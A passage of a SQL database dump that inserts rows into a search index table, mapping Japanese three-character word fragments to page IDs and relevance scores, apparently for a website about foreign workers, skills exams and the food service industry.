('協力し', 69, 'ja', 'node_search', 1),
('協力の', 28, 'ja', 'node_search', 28),
('単なる', 197, 'ja', 'node_search', 1),
('単調さ', 142, 'ja', 'node_search', 1),
('占的な', 62, 'ja', 'node_search', 29),
('原則に', 140, 'ja', 'node_search', 1),
('厨房に', 122, 'ja', 'node_search', 1),
('厨房業', 133, 'ja', 'node_search', 1),
('厳を学', 87, 'ja', 'node_search', 0.60322),
('厳守し', 77, 'ja', 'node_search', 4),
('厳守し', 87, 'ja', 'node_search', 1),
('去には', 3, 'ja', 'node_search', 0.643484),
('参りま', 23, 'ja', 'node_search', 0.412068),
('参りま', 25, 'ja', 'node_search', 1),
('参加し', 62, 'ja', 'node_search', 0.502958),
('参加す', 3, 'ja', 'node_search', 43),
('参加す', 95, 'ja', 'node_search', 1),
('収は約', 163, 'ja', 'node_search', 0.824901),
('収入か', 8, 'ja', 'node_search', 2),
('収目安', 163, 'ja', 'node_search', 0.860547),
('収穫作', 163, 'ja', 'node_search', 0.923838),
('取り合', 62, 'ja', 'node_search', 1),
('取り巻', 122, 'ja', 'node_search', 1),
('取り組', 69, 'ja', 'node_search', 1),
('取り組', 77, 'ja', 'node_search', 1),
('取り組', 135, 'ja', 'node_search', 1),
('取り組', 150, 'ja', 'node_search', 1),
('取り込', 24, 'ja', 'node_search', 0.742984),
('取得お', 83, 'ja', 'node_search', 1),
('取得お', 86, 'ja', 'node_search', 1),
('取得お', 88, 'ja', 'node_search', 1),
('取得お', 89, 'ja', 'node_search', 1),
('取得お', 91, 'ja', 'node_search', 1),
('取得お', 92, 'ja', 'node_search', 1),
('取得お', 93, 'en', 'node_search', 2),
('取得お', 93, 'ja', 'node_search', 1),
('取得お', 96, 'ja', 'node_search', 1),
('取得お', 97, 'ja', 'node_search', 1),
('取得お', 99, 'ja', 'node_search', 1),
('取得お', 103, 'ja', 'node_search', 1),
('取得お', 105, 'ja', 'node_search', 1),
('取得お', 108, 'ja', 'node_search', 1),
('取得お', 145, 'ja', 'node_search', 20),
('取得お', 148, 'ja', 'node_search', 1),
('取得お', 151, 'ja', 'node_search', 20),
('取得お', 152, 'en', 'node_search', 20),
('取得お', 152, 'ja', 'node_search', 20),
('取得お', 153, 'ja', 'node_search', 20),
('取得し', 23, 'ja', 'node_search', 1),
('取得し', 111, 'ja', 'node_search', 1),
('取得し', 147, 'ja', 'node_search', 7),
('取得す', 23, 'ja', 'node_search', 0.444243),
('取得は', 183, 'ja', 'node_search', 1),
('受けた', 24, 'ja', 'node_search', 0.354488),
('受けて', 27, 'ja', 'node_search', 0.410687),
('受けま', 138, 'ja', 'node_search', 1),
('受ける', 3, 'ja', 'node_search', 1.82025),
('受ける', 6, 'ja', 'node_search', 3),
('受ける', 23, 'ja', 'node_search', 0.556022),
('受ける', 142, 'ja', 'node_search', 0.813674),
('受け取', 23, 'ja', 'node_search', 0.681785),
('受講の', 62, 'ja', 'node_search', 4),
('受講料', 155, 'ja', 'node_search', 0.876337),
('受講期', 155, 'ja', 'node_search', 0.886095),
('受験登', 19, 'ja', 'node_search', 3),
('古屋エ', 162, 'ja', 'node_search', 0.805455),
('可を多', 23, 'ja', 'node_search', 0.689612),
('可を得', 23, 'ja', 'node_search', 0.96498),
('可能性', 8, 'ja', 'node_search', 2),
('可能性', 62, 'ja', 'node_search', 0.501918),
('可能性', 120, 'ja', 'node_search', 1),
('可能性', 138, 'ja', 'node_search', 0.699655),
('可能性', 183, 'ja', 'node_search', 27.9274),
('可能性', 191, 'ja', 'node_search', 0.934703),
('可能性', 196, 'ja', 'node_search', 0.993146),
('可能性', 197, 'ja', 'node_search', 1),
('可証の', 27, 'ja', 'node_search', 0.342226),
('号また', 10, 'ja', 'node_search', 1),
('司の待', 120, 'ja', 'node_search', 19),
('司レス', 122, 'ja', 'node_search', 19),
('司料理', 122, 'ja', 'node_search', 0.98493),
('各種サ', 27, 'ja', 'node_search', 0.330366),
('各種バ', 27, 'ja', 'node_search', 0.323901),
('各種商', 27, 'ja', 'node_search', 0.327749),
('各種手', 184, 'ja', 'node_search', 1),
('各種機', 27, 'ja', 'node_search', 0.323059),
('合いま', 62, 'ja', 'node_search', 1),
('合った', 23, 'ja', 'node_search', 0.49376),
('合った', 24, 'ja', 'node_search', 0.472657),
('合った', 26, 'ja', 'node_search', 1),
('合でも', 3, 'ja', 'node_search', 0.668514),
('合に応', 24, 'ja', 'node_search', 0.544759),
('合わせ', 1, 'ja', 'node_search', 1),
('合わせ', 11, 'ja', 'node_search', 27),
('合わせ', 23, 'ja', 'node_search', 0.677939),
('合わせ', 155, 'ja', 'node_search', 0.641769),
('合わせ', 162, 'ja', 'node_search', 0.620288),
('合わせ', 163, 'ja', 'node_search', 0.621888),
('合マス', 62, 'ja', 'node_search', 1.65791),
('合格お', 85, 'ja', 'node_search', 4),
('合格お', 101, 'ja', 'node_search', 4),
('合格お', 102, 'ja', 'node_search', 1),
('合格お', 104, 'ja', 'node_search', 7),
('合格お', 106, 'ja', 'node_search', 1),
('合格お', 110, 'ja', 'node_search', 1),
('合格お', 118, 'ja', 'node_search', 1),
('合格お', 119, 'ja', 'node_search', 1),
('合格お', 124, 'ja', 'node_search', 1),
('合格お', 146, 'ja', 'node_search', 20),
('合格お', 181, 'ja', 'node_search', 4),
('合格さ', 160, 'ja', 'node_search', 1.74762),
('合格さ', 161, 'ja', 'node_search', 1.74996),
('合格さ', 166, 'ja', 'node_search', 1.7717),
('合格さ', 168, 'ja', 'node_search', 1.75946),
('合格さ', 170, 'ja', 'node_search', 1.74529),
('合格さ', 178, 'ja', 'node_search', 1.78178),
('合格さ', 179, 'ja', 'node_search', 1.73165),
('合格さ', 180, 'ja', 'node_search', 1.80007),
('合格さ', 181, 'ja', 'node_search', 1.78178),
('合格さ', 182, 'ja', 'node_search', 1.79212),
('合格さ', 183, 'ja', 'node_search', 1.73165),
('合格さ', 185, 'ja', 'node_search', 1.75231),
('合格さ', 186, 'ja', 'node_search', 1.76922),
('合格さ', 187, 'ja', 'node_search', 1.74069),
('合格さ', 188, 'ja', 'node_search', 1.76188),
('合格さ', 189, 'ja', 'node_search', 1.74996),
('合格さ', 190, 'ja', 'node_search', 1.76922),
('合格さ', 191, 'ja', 'node_search', 1.80818),
('合格さ', 192, 'ja', 'node_search', 4.11692),
('合格さ', 193, 'ja', 'node_search', 1.79475),
('合格さ', 194, 'ja', 'node_search', 1.75231),
('合格さ', 195, 'ja', 'node_search', 1.80545),
('合格さ', 196, 'ja', 'node_search', 1.7974),
('合格さ', 197, 'ja', 'node_search', 1.76922),
('合格さ', 198, 'ja', 'node_search', 1.78178),
('合格さ', 199, 'ja', 'node_search', 1.75468),
('合格し', 23, 'ja', 'node_search', 0.45843),
('合格し', 70, 'ja', 'node_search', 1),
('合格し', 71, 'ja', 'node_search', 1),
('合格し', 72, 'ja', 'node_search', 1),
('合格し', 74, 'ja', 'node_search', 1),
('合格し', 75, 'ja', 'node_search', 1),
('合格し', 81, 'ja', 'node_search', 1),
('合格し', 82, 'ja', 'node_search', 1),
('合格し', 84, 'ja', 'node_search', 1),
('合格し', 90, 'ja', 'node_search', 1),
('合格し', 100, 'ja', 'node_search', 4),
('合格し', 107, 'ja', 'node_search', 1),
('合格し', 109, 'ja', 'node_search', 1),
('合格し', 112, 'ja', 'node_search', 1),
('合格し', 114, 'ja', 'node_search', 1),
('合格し', 115, 'ja', 'node_search', 1),
('合格し', 117, 'ja', 'node_search', 1),
('合格し', 121, 'ja', 'node_search', 1),
('合格し', 123, 'ja', 'node_search', 1),
('合格し', 125, 'ja', 'node_search', 1),
('合格し', 131, 'ja', 'node_search', 1),
('合格し', 132, 'ja', 'node_search', 1),
('合格し', 133, 'ja', 'node_search', 0.776703),
('合格し', 134, 'ja', 'node_search', 1),
('合格し', 135, 'ja', 'node_search', 1),
('合格し', 136, 'ja', 'node_search', 2),
('合格し', 137, 'ja', 'node_search', 1),
('合格し', 139, 'ja', 'node_search', 1),
('合格し', 140, 'ja', 'node_search', 1),
('合格し', 141, 'ja', 'node_search', 1),
('合格し', 143, 'ja', 'node_search', 1),
('合格し', 144, 'ja', 'node_search', 1),
('合格す', 98, 'ja', 'node_search', 1),
('合格す', 138, 'ja', 'node_search', 0.989021),
('合格で', 62, 'ja', 'node_search', 0.548462),
('合格に', 183, 'ja', 'node_search', 27),
('合格に', 190, 'ja', 'node_search', 1),
('合格に', 194, 'ja', 'node_search', 1),
('合格の', 160, 'ja', 'node_search', 27),
('合格の', 161, 'ja', 'node_search', 31),
('合格の', 166, 'ja', 'node_search', 31),
('合格の', 168, 'ja', 'node_search', 31),
('合格の', 170, 'ja', 'node_search', 31),
('合格の', 178, 'ja', 'node_search', 31),
('合格の', 179, 'ja', 'node_search', 31),
('合格の', 180, 'ja', 'node_search', 31),
('合格の', 181, 'ja', 'node_search', 27),
('合格の', 182, 'ja', 'node_search', 4),
('合格の', 183, 'ja', 'node_search', 4),
('合格の', 185, 'ja', 'node_search', 31),
('合格の', 186, 'ja', 'node_search', 31),
('合格の', 187, 'ja', 'node_search', 31),
('合格の', 188, 'ja', 'node_search', 31),
('合格の', 189, 'ja', 'node_search', 31),
('合格の', 190, 'ja', 'node_search', 31),
('合格の', 191, 'ja', 'node_search', 32),
('合格の', 192, 'ja', 'node_search', 31),
('合格の', 193, 'ja', 'node_search', 31),
('合格の', 194, 'ja', 'node_search', 31),
('合格の', 195, 'ja', 'node_search', 31),
('合格の', 196, 'ja', 'node_search', 31),
('合格の', 197, 'ja', 'node_search', 31),
('合格の', 198, 'ja', 'node_search', 31),
('合格の', 199, 'ja', 'node_search', 31),
('合格の', 200, 'ja', 'node_search', 31),
('合格は', 160, 'ja', 'node_search', 1),
('合格は', 161, 'ja', 'node_search', 1),
('合格は', 166, 'ja', 'node_search', 1),
('合格は', 168, 'ja', 'node_search', 1),
('合格は', 170, 'ja', 'node_search', 1),
('合格は', 178, 'ja', 'node_search', 1),
('合格は', 179, 'ja', 'node_search', 1),
('合格は', 180, 'ja', 'node_search', 2),
('合格は', 181, 'ja', 'node_search', 1),
('合格は', 182, 'ja', 'node_search', 1),
('合格は', 185, 'ja', 'node_search', 1),
('合格は', 186, 'ja', 'node_search', 2),
('合格は', 187, 'ja', 'node_search', 1),
('合格は', 188, 'ja', 'node_search', 1),
('合格は', 189, 'ja', 'node_search', 1),
('合格は', 190, 'ja', 'node_search', 1),
('合格は', 191, 'ja', 'node_search', 1),
('合格は', 192, 'ja', 'node_search', 2),
('合格は', 193, 'ja', 'node_search', 1),
('合格は', 195, 'ja', 'node_search', 1),
('合格は', 196, 'ja', 'node_search', 2),
('合格は', 197, 'ja', 'node_search', 1),
('合格は', 198, 'ja', 'node_search', 1),
('合格は', 199, 'ja', 'node_search', 1),
('合格を', 120, 'ja', 'node_search', 19),
('合格を', 155, 'ja', 'node_search', 0.749958),
('合格結', 179, 'ja', 'node_search', 1),
('合格者', 24, 'ja', 'node_search', 0.705825),
('合格者', 138, 'ja', 'node_search', 1.71423),
('合格者', 162, 'ja', 'node_search', 0.691597),
('合領土', 27, 'ja', 'node_search', 0.942091),
('同じス', 24, 'ja', 'node_search', 0.424938),
('同社は', 27, 'ja', 'node_search', 0.389198),
('同行中', 77, 'ja', 'node_search', 1),
('同語学', 24, 'ja', 'node_search', 0.34557),
('名が日', 157, 'ja', 'node_search', 27),
('名だた', 62, 'ja', 'node_search', 1),
('名の候', 154, 'ja', 'node_search', 1.78691),
('名の候', 157, 'ja', 'node_search', 1),
('名の候', 165, 'ja', 'node_search', 3.99983),
('名の候', 167, 'ja', 'node_search', 1.81645),
('名の候', 169, 'ja', 'node_search', 4.16849),
('名の候', 173, 'ja', 'node_search', 4.04752),
('名の候', 176, 'ja', 'node_search', 1.74069),
('名の生', 140, 'ja', 'node_search', 20),
('名レス', 95, 'ja', 'node_search', 1),
('名利用', 163, 'ja', 'node_search', 0.769219),
('名古屋', 162, 'ja', 'node_search', 0.808176),
('名法か', 133, 'ja', 'node_search', 1),
('名義で', 27, 'ja', 'node_search', 0.345089),
('名限定', 163, 'ja', 'node_search', 0.648686),
('向かっ', 173, 'ja', 'node_search', 0.882818),
('向かっ', 183, 'ja', 'node_search', 0.845322),
('向きな', 120, 'ja', 'node_search', 0.920273),
('向きな', 194, 'ja', 'node_search', 0.989021),
('向きな', 197, 'ja', 'node_search', 0.980874),
('向けた', 62, 'ja', 'node_search', 0.482016),
('向けた', 160, 'ja', 'node_search', 1),
('向けた', 166, 'ja', 'node_search', 1),
('向けた', 168, 'ja', 'node_search', 1),
('向けた', 170, 'ja', 'node_search', 1),
('向けた', 179, 'ja', 'node_search', 1),
('向けた', 180, 'ja', 'node_search', 1),
('向けた', 182, 'ja', 'node_search', 0.957226),
('向けた', 185, 'ja', 'node_search', 1),
('向けた', 186, 'ja', 'node_search', 1),
('向けた', 188, 'ja', 'node_search', 1),
('向けた', 191, 'ja', 'node_search', 0.980874),
('向けた', 192, 'ja', 'node_search', 1),
('向けた', 193, 'ja', 'node_search', 1),
('向けた', 195, 'ja', 'node_search', 1),
('向けた', 196, 'ja', 'node_search', 1),
('向けた', 198, 'ja', 'node_search', 1),
('向けた', 199, 'ja', 'node_search', 1),
('向けて', 142, 'ja', 'node_search', 1),
('向けて', 156, 'ja', 'node_search', 1),
('向けて', 157, 'ja', 'node_search', 1),
('向けて', 186, 'ja', 'node_search', 0.882818),
('向けて', 190, 'ja', 'node_search', 0.972861),
('向けに', 27, 'ja', 'node_search', 0.645209),
('向けの', 7, 'ja', 'node_search', 1.83949),
('向けレ', 98, 'ja', 'node_search', 19),
('向上さ', 87, 'ja', 'node_search', 0.824901),
('向上と', 182, 'ja', 'node_search', 0.882818),
('向上の', 198, 'ja', 'node_search', 0.949597),
('向上を', 181, 'ja', 'node_search', 1),
('向上を', 182, 'ja', 'node_search', 1),
('向上を', 183, 'ja', 'node_search', 1),
('含めた', 163, 'ja', 'node_search', 0.836446),
('告いた', 154, 'ja', 'node_search', 1),
('告いた', 160, 'ja', 'node_search', 1),
('告いた', 164, 'ja', 'node_search', 1),
('告いた', 165, 'ja', 'node_search', 1),
('告いた', 167, 'ja', 'node_search', 1),
('告いた', 169, 'ja', 'node_search', 1),
('告いた', 171, 'ja', 'node_search', 1),
('告いた', 173, 'ja', 'node_search', 1),
('告いた', 174, 'ja', 'node_search', 1),
('告いた', 175, 'ja', 'node_search', 1),
('告いた', 176, 'ja', 'node_search', 1),
('告いた', 177, 'ja', 'node_search', 1),
('告いた', 179, 'ja', 'node_search', 1),
('告いた', 184, 'ja', 'node_search', 1),
('周辺都', 24, 'ja', 'node_search', 0.359127),
('味のあ', 155, 'ja', 'node_search', 0.72066),
('味のあ', 163, 'ja', 'node_search', 0.640063),
('味を持', 24, 'ja', 'node_search', 0.641769),
('味を維', 142, 'ja', 'node_search', 1),
('命に取', 77, 'ja', 'node_search', 1),
('命働き', 87, 'ja', 'node_search', 1.2473),
('命働く', 87, 'ja', 'node_search', 1),
('命勉強', 98, 'ja', 'node_search', 1),
('命名法', 133, 'ja', 'node_search', 1),
('品サー', 68, 'ja', 'node_search', 1),
('品製造', 115, 'ja', 'node_search', 1),
('品関係', 24, 'ja', 'node_search', 0.60322),
('員がい', 27, 'ja', 'node_search', 0.310172),
('員に同', 77, 'ja', 'node_search', 1),
('員の名', 27, 'ja', 'node_search', 0.346054),
('員を雇', 23, 'ja', 'node_search', 0.784336),
('員住宅', 27, 'ja', 'node_search', 0.370453),
('員向け', 27, 'ja', 'node_search', 0.646943),
('商業建', 27, 'ja', 'node_search', 0.381945),
('商用ト', 27, 'ja', 'node_search', 0.326885),
('商社は', 27, 'ja', 'node_search', 0.349971),
('商社株', 9, 'ja', 'node_search', 28),
('商社株', 17, 'ja', 'node_search', 29),
('問いた', 1, 'ja', 'node_search', 1),
('問い合', 1, 'ja', 'node_search', 1),
('問い合', 11, 'ja', 'node_search', 27),
('問い合', 155, 'ja', 'node_search', 0.645209),
('問い合', 162, 'ja', 'node_search', 0.623497),
('問い合', 163, 'ja', 'node_search', 0.625114),
('問やお', 1, 'ja', 'node_search', 1),
('問わず', 23, 'ja', 'node_search', 0.618696),
('問わず', 24, 'ja', 'node_search', 1),
('問介護', 162, 'en', 'node_search', 1),
('問介護', 162, 'ja', 'node_search', 33),
('問題あ', 3, 'ja', 'node_search', 1),
('問題で', 3, 'ja', 'node_search', 1),
('問題な', 62, 'ja', 'node_search', 0.543537),
('問題を', 136, 'ja', 'node_search', 0.7017),
('善を尽', 87, 'ja', 'node_search', 0.7017),
('善事業', 27, 'ja', 'node_search', 0.525844),
('喜びで', 135, 'ja', 'node_search', 0.779231),
('営して', 25, 'ja', 'node_search', 1),
('営を開', 23, 'ja', 'node_search', 1),
('営んで', 27, 'ja', 'node_search', 0.866793),
('回の出', 165, 'ja', 'node_search', 1),
('回の出', 174, 'ja', 'node_search', 1),
('回の出', 184, 'ja', 'node_search', 1),
('回の合', 160, 'ja', 'node_search', 1),
('回の合', 166, 'ja', 'node_search', 1),
('回の合', 168, 'ja', 'node_search', 1),
('回の合', 170, 'ja', 'node_search', 1),
('回の合', 178, 'ja', 'node_search', 1),
('回の合', 179, 'ja', 'node_search', 1),
('回の合', 180, 'ja', 'node_search', 1),
('回の合', 185, 'ja', 'node_search', 1),
('回の合', 186, 'ja', 'node_search', 1),
('回の合', 187, 'ja', 'node_search', 1),
('回の合', 188, 'ja', 'node_search', 1),
('回の合', 189, 'ja', 'node_search', 1),
('回の合', 190, 'ja', 'node_search', 1),
('回の合', 192, 'ja', 'node_search', 1),
('回の合', 193, 'ja', 'node_search', 1),
('回の合', 194, 'ja', 'node_search', 1),
('回の合', 195, 'ja', 'node_search', 1),
('回の合', 196, 'ja', 'node_search', 1),
('回の合', 197, 'ja', 'node_search', 1),
('回の合', 198, 'ja', 'node_search', 1),
('回の合', 199, 'ja', 'node_search', 1),
('回の成', 191, 'ja', 'node_search', 1),
('回の素', 181, 'ja', 'node_search', 1),
('回の素', 182, 'ja', 'node_search', 1),
('回の素', 183, 'ja', 'node_search', 1),
('回の素', 194, 'ja', 'node_search', 0.942091),
('回の素', 197, 'ja', 'node_search', 0.934703),
('回の結', 189, 'ja', 'node_search', 0.892724),
('回クラ', 133, 'ja', 'node_search', 0.949597),
('回レス', 116, 'ja', 'node_search', 19),
('困難に', 136, 'ja', 'node_search', 0.920273),
('図作成', 27, 'ja', 'node_search', 0.536316),
('国から', 23, 'ja', 'node_search', 0.63167),
('国が規', 3, 'ja', 'node_search', 0.556022),
('国など', 23, 'ja', 'node_search', 0.525844),
('国など', 24, 'ja', 'node_search', 0.567769),
('国に到', 3, 'ja', 'node_search', 1),
('国に在', 3, 'ja', 'node_search', 1),
('国に戻', 3, 'ja', 'node_search', 0.569105),
('国に渡', 3, 'ja', 'node_search', 0.76188),
('国に行', 19, 'ja', 'node_search', 3),
('国の仕', 28, 'ja', 'node_search', 1),
('国の文', 3, 'ja', 'node_search', 0.824901),
('国の環', 138, 'ja', 'node_search', 0.873132),
('国の言', 24, 'ja', 'node_search', 0.980874),
('国の造', 6, 'ja', 'node_search', 28),
('国の造', 8, 'ja', 'node_search', 27),
('国の造', 10, 'ja', 'node_search', 28),
('国の造', 23, 'ja', 'node_search', 0.610858),
('国の造', 24, 'ja', 'node_search', 1),
('国人に', 7, 'ja', 'node_search', 28.8861),
('国人船', 27, 'ja', 'node_search', 0.347512),
('国側担', 29, 'ja', 'node_search', 28),
('国内で', 155, 'ja', 'node_search', 0.822065),
('国内外', 27, 'ja', 'node_search', 0.594307),
('国報告', 156, 'ja', 'node_search', 27),
('国報告', 157, 'ja', 'node_search', 27),
('国籍青', 27, 'ja', 'node_search', 0.805455),
('国語で', 3, 'ja', 'node_search', 0.524706),
('国語ク', 24, 'ja', 'node_search', 0.427163),
('国語コ', 28, 'ja', 'node_search', 28),
('国語学', 24, 'ja', 'node_search', 0.892724),
('国際ス', 25, 'ja', 'node_search', 1),
('国際ス', 26, 'ja', 'node_search', 1),
('国際的', 194, 'ja', 'node_search', 1),
('土を拠', 27, 'ja', 'node_search', 0.934703),
('土建屋', 27, 'ja', 'node_search', 0.398673),
('在の外', 142, 'ja', 'node_search', 0.784336),
('在の職', 3, 'ja', 'node_search', 0.625114),
('在住す', 3, 'ja', 'node_search', 1),
('在日本', 24, 'ja', 'node_search', 0.909743),
('在日本', 155, 'ja', 'node_search', 0.830633),
('在的な', 136, 'ja', 'node_search', 0.707906),
('在的な', 138, 'ja', 'node_search', 0.685676),
('地域消', 27, 'ja', 'node_search', 0.366053),
('地方域', 27, 'ja', 'node_search', 4.60476),
('型レス', 77, 'ja', 'node_search', 4),
('城県つ', 163, 'ja', 'node_search', 28.9611),
('域で元', 27, 'ja', 'node_search', 0.655756),
('域消防', 27, 'ja', 'node_search', 0.36551),
('培およ', 163, 'ja', 'node_search', 0.938382),
('基づい', 140, 'ja', 'node_search', 1),
('基本に', 25, 'ja', 'node_search', 1),
('基本給', 162, 'ja', 'node_search', 0.729424),
('基準で', 24, 'ja', 'node_search', 0.469921),
('基準で', 26, 'ja', 'node_search', 1),
('基準に', 27, 'ja', 'node_search', 0.581429),
('基礎か', 24, 'ja', 'node_search', 0.402597),
('基礎教', 27, 'ja', 'node_search', 0.360175),
('報われ', 140, 'ja', 'node_search', 1),
('報告い', 154, 'ja', 'node_search', 1),
('報告い', 160, 'ja', 'node_search', 1),
('報告い', 164, 'ja', 'node_search', 1),
('報告い', 165, 'ja', 'node_search', 1),
('報告い', 167, 'ja', 'node_search', 1),
('報告い', 169, 'ja', 'node_search', 1),
('報告い', 171, 'ja', 'node_search', 1),
('報告い', 173, 'ja', 'node_search', 1),
('報告い', 174, 'ja', 'node_search', 1),
('報告い', 175, 'ja', 'node_search', 1),
('報告い', 176, 'ja', 'node_search', 1),
('報告い', 177, 'ja', 'node_search', 1),
('報告い', 179, 'ja', 'node_search', 1),
('報告い', 184, 'ja', 'node_search', 1),
('場での', 24, 'ja', 'node_search', 0.463662),
('場では', 87, 'ja', 'node_search', 1.9347),
('場で一', 5, 'ja', 'node_search', 3),
('場で困', 136, 'ja', 'node_search', 0.927431),
('場で多', 167, 'ja', 'node_search', 1),
('場で必', 140, 'ja', 'node_search', 0.927431),
('場で必', 155, 'ja', 'node_search', 1),
('場で活', 188, 'ja', 'node_search', 0.896076),
('場の大', 87, 'ja', 'node_search', 1),
('場を変', 3, 'ja', 'node_search', 0.679856),
('場合で', 3, 'ja', 'node_search', 0.670377),
('場合に', 24, 'ja', 'node_search', 0.545988),
('場合は', 3, 'ja', 'node_search', 0.514686),
('場環境', 120, 'ja', 'node_search', 0.906287),
('場用の', 23, 'ja', 'node_search', 0.945829),
('場経験', 136, 'ja', 'node_search', 0.759465),
('境での', 138, 'ja', 'node_search', 0.863659),
('境の中', 169, 'ja', 'node_search', 0.96498),
('境を育', 120, 'ja', 'node_search', 0.899454),
('士号ま', 10, 'ja', 'node_search', 1),
('売する', 23, 'ja', 'node_search', 0.842342),
('売と建', 27, 'ja', 'node_search', 0.902857),
('売を開', 27, 'ja', 'node_search', 0.317692),
('売買を', 27, 'ja', 'node_search', 0.340813),
('変える', 3, 'ja', 'node_search', 0.676032),
('変嬉し', 1, 'ja', 'node_search', 1),
('変重要', 188, 'ja', 'node_search', 0.96498),
('外で働', 26, 'ja', 'node_search', 1),
('外に勤', 24, 'ja', 'node_search', 1),
('外の仕', 23, 'ja', 'node_search', 0.425677),
('外の労', 27, 'ja', 'node_search', 0.591395),
('外エー', 23, 'ja', 'node_search', 2.0823),
('外エー', 24, 'ja', 'node_search', 1.46543),
('外労働', 3, 'ja', 'node_search', 0.547222),
('外国の', 28, 'ja', 'node_search', 1),
('外国の', 138, 'ja', 'node_search', 0.876337),
('外国人', 7, 'ja', 'node_search', 28.8861),
('外国人', 27, 'ja', 'node_search', 0.348001),
('外就労', 154, 'ja', 'node_search', 0.813674),
('外就労', 164, 'ja', 'node_search', 0.776703),
('外就労', 165, 'ja', 'node_search', 0.774192),
('外就労', 167, 'ja', 'node_search', 0.845322),
('外職に', 98, 'ja', 'node_search', 1),
('外職候', 142, 'ja', 'node_search', 0.779231),
('外食ビ', 111, 'ja', 'node_search', 1),
('外食合', 124, 'ja', 'node_search', 1),
('外食実', 133, 'ja', 'node_search', 1),
('外食業', 156, 'ja', 'node_search', 28.9384),
('外食業', 157, 'ja', 'node_search', 28.8335),
('外食業', 160, 'ja', 'node_search', 30.9905),
('外食業', 161, 'ja', 'node_search', 29.75),
('外食業', 167, 'ja', 'node_search', 29.8165),
('外食業', 173, 'ja', 'node_search', 29.755),
('外食業', 174, 'ja', 'node_search', 29.7185),
('外食業', 175, 'ja', 'node_search', 29.7643),
('外食業', 176, 'ja', 'node_search', 29.7407),
('外食業', 177, 'ja', 'node_search', 29.71),
('外食業', 179, 'ja', 'node_search', 29.7316),
('外食業', 180, 'ja', 'node_search', 28.8001),
('外食業', 184, 'ja', 'node_search', 28.7571),
('外食業', 185, 'ja', 'node_search', 31.9782),
('外食業', 186, 'ja', 'node_search', 28.7692),
('外食業', 187, 'ja', 'node_search', 32.9124),
('外食業', 190, 'ja', 'node_search', 32.0769),
('外食業', 191, 'ja', 'node_search', 31.2327),
('外食業', 192, 'ja', 'node_search', 32.1169),
('外食業', 193, 'ja', 'node_search', 32.179),
('外食業', 194, 'ja', 'node_search', 32.0092),
('外食業', 195, 'ja', 'node_search', 29.8055),
('外食業', 196, 'ja', 'node_search', 31.1896),
('外食業', 197, 'ja', 'node_search', 31.0769),
('外食業', 198, 'ja', 'node_search', 29.7818),
('外食業', 199, 'ja', 'node_search', 31.0187),
('外食業', 200, 'ja', 'node_search', 32.1041),
('外食第', 133, 'ja', 'node_search', 0.972861),
('外食面', 85, 'ja', 'node_search', 4),
('多いも', 165, 'ja', 'node_search', 0.842342),
('多いも', 166, 'ja', 'node_search', 0.830633),
('多いも', 178, 'ja', 'node_search', 0.886095),
('多いも', 185, 'ja', 'node_search', 0.781775),
('多いも', 187, 'ja', 'node_search', 0.808176),
('多くの', 27, 'ja', 'node_search', 1.2891),
('多くの', 164, 'ja', 'node_search', 0.869951),
('多くの', 167, 'ja', 'node_search', 1),
('多くの', 169, 'ja', 'node_search', 0.949597),
('多くの', 173, 'ja', 'node_search', 0.931053),
('多くの', 174, 'ja', 'node_search', 0.848323),
('多くの', 175, 'ja', 'node_search', 0.942091),
('多くの', 176, 'ja', 'node_search', 0.972861),
('多くの', 177, 'ja', 'node_search', 0.851346),
('多くの', 184, 'ja', 'node_search', 0.863659),
('多くの', 185, 'ja', 'node_search', 0.957226),
('多くの', 187, 'ja', 'node_search', 0.934703),
('多くの', 190, 'ja', 'node_search', 0.873132),
('多くの', 193, 'ja', 'node_search', 0.98493),
('多くの', 194, 'ja', 'node_search', 0.851346),
('多くの', 197, 'ja', 'node_search', 0.876337),
('多くの', 198, 'ja', 'node_search', 0.993146),
('多く受', 23, 'ja', 'node_search', 0.685676),
('夜間の', 87, 'ja', 'node_search', 0.76431),
('大いに', 126, 'ja', 'node_search', 1),
('大いに', 180, 'ja', 'node_search', 0.913226),
('大いに', 186, 'ja', 'node_search', 0.945829),
('大いに', 188, 'ja', 'node_search', 0.869951),
('大きな', 135, 'ja', 'node_search', 0.786915),
('大きな', 160, 'ja', 'node_search', 1),
('大きな', 161, 'ja', 'node_search', 1),
('大きな', 164, 'ja', 'node_search', 1),
('大きな', 168, 'ja', 'node_search', 1),
('大きな', 170, 'ja', 'node_search', 1),
('大きな', 171, 'ja', 'node_search', 1),
('大きな', 174, 'ja', 'node_search', 0.98493),
('大きな', 175, 'ja', 'node_search', 1),
('大きな', 177, 'ja', 'node_search', 1),
('大きな', 180, 'ja', 'node_search', 1),
('大きな', 181, 'ja', 'node_search', 0.920273),
('大きな', 190, 'ja', 'node_search', 0.961087),
('大きな', 194, 'ja', 'node_search', 1),
('大きな', 196, 'ja', 'node_search', 1),
('大きな', 199, 'ja', 'node_search', 1),
('大人の', 87, 'ja', 'node_search', 1),
('大切で', 3, 'ja', 'node_search', 0.508221),
('大切な', 178, 'ja', 'node_search', 1),
('大切な', 182, 'ja', 'node_search', 0.945829),
('大切な', 185, 'ja', 'node_search', 1),
('大切な', 186, 'ja', 'node_search', 0.997306),
('大切な', 187, 'ja', 'node_search', 1),
('大切な', 188, 'ja', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('大切な', 190, 'ja', 'node_search', 1),
('大切な', 191, 'ja', 'node_search', 0.968904),
('大切な', 192, 'ja', 'node_search', 0.957226),
('大切な', 193, 'ja', 'node_search', 1),
('大切な', 197, 'ja', 'node_search', 1),
('大切な', 198, 'ja', 'node_search', 1),
('大切に', 69, 'ja', 'node_search', 1),
('大型レ', 77, 'ja', 'node_search', 4),
('大変嬉', 1, 'ja', 'node_search', 1),
('大変重', 188, 'ja', 'node_search', 0.968904),
('大学の', 10, 'ja', 'node_search', 1),
('大学を', 18, 'ja', 'node_search', 0.980874),
('大学を', 62, 'ja', 'node_search', 1),
('大臣に', 9, 'ja', 'node_search', 3),
('大臣に', 17, 'ja', 'node_search', 4),
('大規模', 23, 'ja', 'node_search', 1),
('大都市', 111, 'ja', 'node_search', 1),
('大限に', 116, 'ja', 'node_search', 1),
('失がな', 26, 'ja', 'node_search', 1),
('奨励し', 133, 'ja', 'node_search', 0.703756),
('女たち', 80, 'ja', 'node_search', 1),
('女たち', 157, 'ja', 'node_search', 1),
('女の安', 156, 'ja', 'node_search', 1),
('女性で', 18, 'ja', 'node_search', 1),
('妹たち', 69, 'ja', 'node_search', 1),
('妹を誇', 69, 'ja', 'node_search', 1),
('姉妹た', 69, 'ja', 'node_search', 1),
